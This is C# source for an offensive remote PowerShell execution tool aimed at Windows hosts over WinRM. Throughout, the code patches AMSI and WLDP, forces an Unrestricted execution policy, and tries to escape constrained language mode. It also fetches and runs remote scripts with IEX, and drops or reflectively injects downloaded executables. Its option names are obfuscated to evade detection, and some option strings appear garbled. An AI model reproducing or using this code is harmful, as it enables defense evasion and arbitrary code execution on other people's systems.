private static void ImportModulesByPowerShell(PowerShell ps, ArrayList array_imports, bool encrypted, string aes_key, DecryptionMethod decryptionMethod)
{
if (array_imports.Count > 0)
{
foreach (string module in array_imports)
{
if (string.IsNullOrEmpty(module))
{
continue;
}
if (module.StartsWith("http"))
{
Utils.PSImportRemoteResource(ps, module, encrypted, aes_key, ImportMethod.READFILE, decryptionMethod);
}
else
{
Utils.PSImportLocalResource(ps, module, encrypted, aes_key, decryptionMethod);
}
}
}
}
private static string PSLoadAssembly(PowerShell ps, string code, string execute_assembly, bool assembly_encrypted, string aes_key, bool reflective_injection, bool is_dotnet, DecryptionMethod decryptionMethod, ref bool ret)
{
string destVarName = "$PEBytes";
string execute_stub = $"{destVarName} = [byte[]] (";
try
{
string destination = $"C:\\Users\\Public\\{Path.GetFileNameWithoutExtension(Path.GetRandomFileName())}.exe";
if (decryptionMethod == DecryptionMethod.CSHARP || !assembly_encrypted)
{
byte[] assembly = LoadAssembly(execute_assembly, assembly_encrypted, aes_key);
execute_stub += $"0x{BitConverter.ToString(assembly).Replace("-", ", 0x")} );";
}
else if (decryptionMethod == DecryptionMethod.POWERSHELL && assembly_encrypted)
{
Utils.PSAddDecryptionRoutine(ps);
string encrypted_assembly = Utils.DownloadAssembly(execute_assembly);
Utils.PSInvokeDecrypt(ps, encrypted_assembly, aes_key, Format.FILE, destVarName);
execute_assembly = "";
//execute_stub = $"{destVarName} = (Invoke-DecryptToBytes -CipherText {encrypted_assembly} -Key {aes_key});";
}
else
{
throw new NotSupportedException($"Method {decryptionMethod} not supported");
}
if (!reflective_injection)
{
execute_stub += $"[io.file]::WriteAllBytes('{destination}',{destVarName});sleep 1;";
execute_stub += $"& '{destination}' {code}";
}
else
{
if (!is_dotnet)
{
// execute_stub += $"Invoke-ReflectivePEInjection -ErrorAction silentlycontinue -PEBytes $PEBytes -ExeArgs '{code}' ";
execute_stub += $"Invoke-ReflectivePEInjection -PEBytes {destVarName} -ExeArgs '{code}' | Out-String";
}
else
{
execute_stub += $"[System.Reflection.Assembly]::Load({destVarName}); {code}";
}
}
ret = true;
return(execute_stub);
}
catch
{
ret = false;
return(code);
}
}
private static void Main(string[] args)
{
var help = false;
var outstring = false;
var target = string.Empty;
var code = string.Empty;
var encoded = false;
var redirect = false;
var domain = string.Empty;
var username = string.Empty;
var password = string.Empty;
var imports = string.Empty;
var am_si_bypass_module = string.Empty;
var script2encript = string.Empty;
var script2decript = string.Empty;
var amsi_encrypted = false;
var skip_bypass = string.Empty;
var wldp_bypass = string.Empty;
var wldp_bypass_encrypted = false;
var execute_assembly = string.Empty;
var is_dotnet = false;
var reflective_injection = false;
var assembly_encrypted = false;
var imports_encrypted = false;
var escape_lockdown = false;
var use_ssl = false;
var use_powershell_decryption = false;
var display_target = string.Empty;
DecryptionMethod decryptionMethod = DecryptionMethod.CSHARP;
var aes_key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const int CODE_LEN_MAX = 150;
ArrayList array_imports = new ArrayList();
var options = new OptionSet
{
{ "t|target=", "Target machine", o => target = o },
{ "c|code=", "Code to execute", o => code = o },
{ "e|encoded", "Indicates that provided code is base64 encoded", o => encoded = true },
{ "a|am-si-bypass="******"Uses the given PowerShell script to bypass A-M-S-I (fs, smb o http[s])", o => am_si_bypass_module = o },
{ "aX|encrypted-am-si", "Indicates that provided A.M.S.I. bypass is encrypted", o => amsi_encrypted = true },
{ "i|import=", "Imports additional PowerShell modules (fs, smb o http[s])", o => imports = o },
{ "iX|encrypted-imports", "Indicates that provided PowerShell modules are encrypted", o => imports_encrypted = true },
{ "o|outstring", "Append Out-String to code", o => outstring = true },
{ "r|redirect", "Redirect stderr to stdout", o => redirect = true },
{ "d|domain=", "Domain for alternate credentials", o => domain = o },
{ "u|username="******"Username for alternate credentials", o => username = o },
{ "p|password="******"Password for alternate credentials", o => password = o },
{ "X|encrypt=", "Encrypt a script with an hardcoded key", o => script2encript = o },
{ "D|decrypt=", "Test decryption of a script with an hardcoded key", o => script2decript = o },
{ "n|skip-bypass="******"Skip A.M.S.I (A), WLDP (W) or ALL (*) Bypass techniques", o => skip_bypass = o },
{ "l|lockdown-escape", "Try to enable PowerShell FullLanguage mode using REGINI", o => escape_lockdown = true },
{ "w|wldp-bypass="******"Uses the given PowerShell script to bypass WLDP (fs, smb o http[s])", o => wldp_bypass = o },
{ "wX|encrypted-wldp", "Indicates that provided WLDP bypass is encrypted", o => wldp_bypass_encrypted = true },
{ "x|executable=", "[Download and] Execute given executable", o => execute_assembly = o },
{ "xX|encrypted-executable", "Indicates that provided Exe/DLL is encrypted", o => assembly_encrypted = true },
{ "xCS|executable-csharp", "Indicates that the executable provided is C# (.NET)", o => is_dotnet = true },
{ "R|reflective-injection", "Uses Invoke-ReflectivePEInjection to load the assmebly from memory (requires Invoke-ReflectivePEInjection to be imported!)", o => reflective_injection = true },
{ "P|powershell-decrypt", "Force use of PowerShell-based decryption", o => use_powershell_decryption = true },
{ "k|encryption-key=", "Uses the provided key for encryption/decryption", o => aes_key = o },
{ "ssl", "Force use of SSL", o => use_ssl = true },
{ "h|?|help", "Show Help", o => help = true }
};
try
{
options.Parse(args);
if (help)
{
ShowHelp(options);
return;
}
if (use_powershell_decryption)
{
decryptionMethod = DecryptionMethod.POWERSHELL;
}
if (!string.IsNullOrEmpty(skip_bypass))
{
bool valid = false;
char[] allowed_options = new char[] { (char)0x41, (char)0x57, (char)0x2a };
foreach (char c in allowed_options)
{
if (skip_bypass.Equals(c.ToString()))
{
valid = true;
break;
}
}
if (!valid)
{
throw new ArgumentException("[-] Unknown option for --skip-bypass, allowed are: A, W and *");
}
}
if (!string.IsNullOrEmpty(script2encript))
{
EncryptScript(script2encript, aes_key);
return;
}
if (!string.IsNullOrEmpty(script2decript))
{
DecryptScript(script2decript, Format.FILE, aes_key, true);
return;
}
if (string.IsNullOrEmpty(code))
{
ShowHelp(options);
return;
}
if (reflective_injection && string.IsNullOrEmpty(execute_assembly))
{
throw new ArgumentNullException("[-] Reflective Injection requires an Assembly to load!");
}
display_target = target;
if (string.IsNullOrEmpty(target))
{
Console.WriteLine("[*] No target given, using current machine name");
target = null;
display_target = Environment.MachineName;
}
if (!string.IsNullOrEmpty(imports))
{
char delim = (char)0x2c;
foreach (string im in imports.Split(delim))
{
array_imports.Add(im);
}
}
}
catch (Exception e)
{
Console.Error.WriteLine(e.Message);
ShowHelp(options);
return;
}
try
{
WSManConnectionInfo conn;
if (!string.IsNullOrEmpty(target))
{
Uri uri;
if (!use_ssl)
{
uri = new Uri($"http://{target}:5985/WSMAN");
}
else
{
uri = new Uri($"https://{target}:5986/WSMAN");
}
conn = new WSManConnectionInfo(uri);
conn.SkipCACheck = true;
conn.SkipCNCheck = true;
if ((domain ?? username ?? password) == null || (domain ?? username ?? password) == string.Empty)
{
var pass = new SecureString();
foreach (var c in password)
{
pass.AppendChar(c);
}
var cred = new PSCredential($"{domain}\\{username}", pass);
conn.Credential = cred;
}
}
else
{
conn = null;
}
if (escape_lockdown)
{
using (var runspace = CreateRunSpace(conn)) {
runspace.Open();
Console.WriteLine("[*] Attempting to enable FullLanguage Mode");
if (!AttemptRegalBypass(runspace))
{
Console.WriteLine($"[-] Could not set Lockdown Policy -> FullLanguage on {display_target}");
}
else
{
Console.WriteLine("[+] Enabled FullLanguage Mode");
}
}
}
using (var runspace = CreateRunSpace(conn))
{
runspace.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = runspace;
if (!UnrestrictedPolicyByPowerShell(ps))
{
Console.WriteLine($"[-] Could not set Execution-Policy -> Unrestricted on {display_target}");
}
else
{
Console.WriteLine("[+] Set Execution-Policy -> Unrestricted");
}
if (skip_bypass.Equals("W") || string.IsNullOrEmpty(skip_bypass))
{
Console.WriteLine("[*] Attempt A.M.S.I Bypass");
if (string.IsNullOrEmpty(am_si_bypass_module) && !runspace.RunspaceIsRemote)
{
if (!BuiltinAmsiBypass(ps))
{
Console.WriteLine("[*] WARNING: A.M.S.I Bypass FAILED!");
}
}
else if (!BypassWithRemoteModule(ps, am_si_bypass_module, amsi_encrypted, aes_key, decryptionMethod))
{
Console.WriteLine("[*] WARNING: A.M.S.I Bypass FAILED!");
}
else
{
Console.WriteLine("[+] A.|\\/|SI -> Patched!");
}
}
if (skip_bypass.Equals("A") || string.IsNullOrEmpty(skip_bypass))
{
Console.WriteLine("[*] Attempt WLDP Bypass");
if (string.IsNullOrEmpty(am_si_bypass_module) && !runspace.RunspaceIsRemote)
{
if (!BuiltinWldpBypass(ps))
{
Console.WriteLine("[*] WARNING: WLDP Bypass FAILED!");
}
}
else if (!BypassWithRemoteModule(ps, wldp_bypass, wldp_bypass_encrypted, aes_key, decryptionMethod))
{
Console.WriteLine("[*] WARNING: WLDP Bypass FAILED!");
}
else
{
Console.WriteLine("[+] WLDP -> Patched!");
}
}
bool success = false;
if (!string.IsNullOrEmpty(execute_assembly))
{
Console.Write("[*] Loading assembly to execute... ");
code = PSLoadAssembly(ps, code, execute_assembly, assembly_encrypted, aes_key, reflective_injection, is_dotnet, decryptionMethod, ref success);
if (success)
{
Console.WriteLine("SUCCESS");
}
else
{
Console.WriteLine("FAILURE");
}
}
string display_command = code;
Console.WriteLine("[*] Importing modules");
ImportModulesByPowerShell(ps, array_imports, imports_encrypted, aes_key, decryptionMethod);
if (code.Length > CODE_LEN_MAX)
{
display_command = code.Substring(0, 45) + " ... " + code.Substring(code.Length - 45);
}
Console.WriteLine($"[*] Executind command: {display_command}");
ExecuteByPowerShell(ps, code, redirect, outstring, encoded);
}
}
catch (Exception e)
{
Console.Error.WriteLine(e.Message);
}
}
public static bool PSImportRemoteResource(PowerShell ps, string resource, bool encrypted, string aes_key, ImportMethod importMethod, DecryptionMethod decryptionMethod)
{
if (encrypted && importMethod == ImportMethod.WEBCLIENT)
{
throw new NotSupportedException("Importing via WebClient doesn't support encrypted scripts");
}
if (importMethod == ImportMethod.WEBCLIENT)
{
try
{
Console.Write($" [>] Importing file: {resource}... ");
string code = $"IEX (New-Object Net.WebClient).DownloadString('{resource}');";
ps.AddScript(code).Invoke();
Console.WriteLine("SUCCESS");
return(true);
}
catch (Exception e)
{
Console.WriteLine($"FAILURE: {e}");
return(false);
}
}
else
{
try
{
string script;
string decrypted = null;
using (var wc = new WebClient())
{
script = wc.DownloadString(resource);
}
Console.Write($" [>] Importing file: {resource}... ");
string import_code = $"IEX {script};";
if (encrypted)
{
if (decryptionMethod == DecryptionMethod.POWERSHELL)
{
string ps_var = "$decrypted_script";
PSAddDecryptionRoutine(ps);
PSInvokeDecrypt(ps, script, aes_key, Format.STRING, ps_var);
import_code = $"IEX {ps_var}";
}
else if (decryptionMethod == DecryptionMethod.CSHARP)
{
decrypted = Program.DecryptScript(script, Format.STRING, aes_key, false);
import_code = $"IEX {decrypted};";
}
else
{
throw new NotSupportedException($"FAILURE: {decryptionMethod} not supported");
}
}
ps.AddScript(import_code).Invoke();
Console.WriteLine("SUCCESS");
return(true);
}
catch (Exception e)
{
Console.WriteLine($"FAILURE: {e}");
return(false);
}
}
}
public static bool PSImportLocalResource(PowerShell ps, string resource, bool encrypted, string aes_key, DecryptionMethod decryptionMethod)
{
try
{
Console.Write($" [>] Importing file: {resource}... ");
string import_code;
if (encrypted)
{
string decrypted;
if (decryptionMethod == DecryptionMethod.POWERSHELL)
{
string encryptedScript = LoadFromFile(resource);
string ps_var = "$decrypted_script";
PSAddDecryptionRoutine(ps);
PSInvokeDecrypt(ps, encryptedScript, aes_key, Format.STRING, ps_var);
import_code = $"IEX {ps_var}";
}
else if (decryptionMethod == DecryptionMethod.CSHARP)
{
decrypted = Program.DecryptScript(resource, Format.FILE, aes_key, false);
import_code = $"IEX {decrypted};";
}
else
{
throw new NotSupportedException($"FAILURE: {decryptionMethod} not supported");
}
ps.AddScript(import_code).Invoke();
}
else
{
ps.AddCommand("Import-Module").AddParameter("Name", resource).Invoke();
}
Console.WriteLine("SUCCESS");
return(true);
}
catch (Exception e)
{
Console.WriteLine($"FAILURE: {e}");
return(false);
}
}
private static bool BypassWithRemoteModule(PowerShell ps, string bypass_uri, bool encrypted, string aes_key, DecryptionMethod decryptionMethod)
{
if (string.IsNullOrEmpty(bypass_uri))
{
return(false);
}
if (bypass_uri.StartsWith("http"))
{
if (Utils.PSImportRemoteResource(ps, bypass_uri, encrypted, aes_key, ImportMethod.READFILE, decryptionMethod))
{
ps.AddCommand("Invoke-Bypass").Invoke();
return(true);
}
return(false);
}
else
{
if (Utils.PSImportLocalResource(ps, bypass_uri, encrypted, aes_key, decryptionMethod))
{
ps.AddCommand("Invoke-Bypass").Invoke();
return(true);
}
return(false);
}
}
